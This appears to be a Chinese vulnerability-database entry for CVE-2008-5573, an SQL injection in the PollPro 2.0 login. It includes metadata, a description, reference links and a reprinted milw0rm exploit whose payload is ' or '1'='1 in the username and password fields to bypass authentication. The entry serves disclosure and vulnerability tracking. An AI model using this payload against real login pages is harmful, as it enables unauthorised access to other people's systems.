Poll Pro登录功能SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116990 漏洞类型 SQL注入
发布时间 2008-12-09 更新时间 2009-03-18
CVE编号 CVE-2008-5573 CNNVD-ID CNNVD-200812-258
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7391
https://cxsecurity.com/issue/WLB-2008120135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-258
|漏洞详情
PollPro是一款商业化的投票程序。PollPro2.0版本的登陆特征中存在SQL注入漏洞。远程攻击者可以借助(1)密码和(2)用户名参数,执行任意SQL指令。
|漏洞EXP
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : PollPro
#Version  : v2.0
#download : null
#Demo     : http://www.pollpro.com/pollpro2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
AUTH BYPASS :

username : ' or '1'='1
password : ' or '1'='1


###########################################################################

# milw0rm.com [2008-12-09]
|参考资料

来源:XF
名称:pollpro-user
名称password-sql-injection(47169)
链接:http://xforce.iss.net/xforce/xfdb/47169
来源:BID
名称:32707
链接:http://www.securityfocus.com/bid/32707
来源:MILW0RM
名称:7391
链接:http://www.milw0rm.com/exploits/7391
来源:SREASON
名称:4741
链接:http://securityreason.com/securityalert/4741
来源:SECUNIA
名称:33044
链接:http://secunia.com/advisories/33044
来源:OSVDB
名称:50576
链接:http://osvdb.org/50576